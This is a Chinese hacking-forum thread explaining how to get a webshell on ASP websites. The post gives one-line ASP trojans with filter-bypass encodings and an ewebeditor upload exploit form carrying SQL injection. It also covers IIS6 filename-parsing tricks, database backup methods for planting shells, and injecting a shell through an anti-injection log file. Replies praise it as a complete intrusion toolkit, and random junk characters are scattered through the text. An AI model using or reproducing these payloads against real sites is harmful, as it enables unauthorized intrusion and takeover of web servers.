返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
% U8 u6 ~4 {/ W" d* e# X" p" W: l- _( A8 [5 {, U  u
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp
! J8 _8 z3 _  r4 x( R5 ~* a1 G  ~8 L- l* C# v  \% _. F! P
3.上传漏洞:
- e6 @0 F+ a( J& c% F) S5 w/ W1 n, t$ s$ n' _
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00; W+ u* l* N; @! _
# p, n, U- |, T+ w( ^, [2 h
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
- ]4 b' r2 a$ a+ |* l. b
0 ^7 K# d5 k' w, `" w! x雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
# I0 }6 e; T6 T然后在上传文件里面填要传的图片格式的ASP木马* c9 ~, a8 C- o8 `
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
- I/ J, A+ z& Z: M' t* N' u4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
9 _% k! C- {, T4 t* O4 K' j  e7 w/ X2 I2 W* J
<html>" }8 c! w5 ]% j" s6 g+ o# Q% z
<head>
& v) z* o9 a8 X<title>ewebeditor upload.asp上传利用</title>
- I* I# ]* C6 L6 Q% R! r# L% D</head>
8 Y2 L! P' J% X9 s<body>. I. l5 O: C: n, O. U% ^  O4 t& L
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
- r; L6 _: V! m* C2 S3 A; E) w<input type=file name=uploadfile size=100><br><br>/ h% ]& n/ h7 P
<input type=submit value=Fuck>
5 l* g: ]) ~0 S0 F3 I) U</form>
6 F  x1 d/ p+ c" |</body>1 s+ _" h+ t5 u7 [* }% Q
</form>
$ ~) P( r) L$ |( T</html># W: p4 {6 S$ f% D
& M" [2 O- T1 Y' s% J( R' u" M. w
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问5 e# A+ g0 H' m! ]- ?0 I4 Y
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp; z7 _- k: T" A% N0 g# O; ]

& q4 W. y0 X  c" a% L利用windows2003解析。建立zjq.asp的文件夹
% S6 E6 A( F! o$ k  n5 L. B
# J/ N$ t7 S6 F8 n6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型) W6 c; N+ E2 h% E2 D

7 ]1 u) E- X' Q- ?7.cuteeditor:类似ewebeditor( Q- J" i5 P. F1 \

  u' z- M' D( a7 T9 L1 d8.htmleditor:同上" r$ k" E' U" q
. Z7 q' M8 n8 _  b# j
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破6 {* a- w/ d; i
6 m1 j6 X  ]& P0 v
<%execute request("value")%><%'<% loop <%:%>3 l: W; g1 P- B, P8 z* |
- Y+ v# O+ T0 u' r, |
<%'<% loop <%:%><%execute request("value")%>
" S! N$ e: c$ u" E7 i. _8 Q1 n7 X* X+ v. v2 K$ R9 w, O
<%execute request("value")'<% loop <%:%>
  O& A8 Z0 `0 Z; X$ l9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞2 B- m% q5 m% H

9 H  C8 Q0 G+ U8 p" p. y8 f: k7 q2 E6 w10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞& t# O% k9 k2 F$ ?$ H1 i. U4 u

/ b6 ^. r' ~* z11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
: r; A0 b' n  N. L6 C1 d& U' H3 y
9 O* o' h  z2 }/ _解析漏洞得到webshell
: b# l( h/ G/ z, h( f# K! J
- L3 p  K- d9 e$ e. ]12.mssql差异备份,日志备份,前提需知道web路径# Q& e' R: s7 S* g- a2 o, O
) {+ f- E1 |- f$ Y# M4 ^3 v$ l
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell* b. g' s7 J: F$ X+ v
9 s& L# x1 a/ q! M; _' X) s
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell# z2 U" j& {! A! f' J5 m& R

- B& [, {3 L& B# y) m* k- _15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可, K7 q+ V- d, I# h

' D  L4 P- e' z以上只是本人的一些拙见,并不完善,以后想到了再继续添加
7 h# C1 B4 ^2 W不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520
; ^1 l- P" W) c- o" j) [( S4 L1 M/ t! \: Y/ h3 P
. F* M* q9 y! ?% ~  c& r
很好啊、基本的入侵方法都包含了5 d8 _  r- i/ t6 z( h/ C8 O& V
6 X" {1 G, ~. r# r7 z
最好来个提权的帖子再。' A4 \! Q$ }1 \3 e

/ A/ n5 Z: k" n4 B- \不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表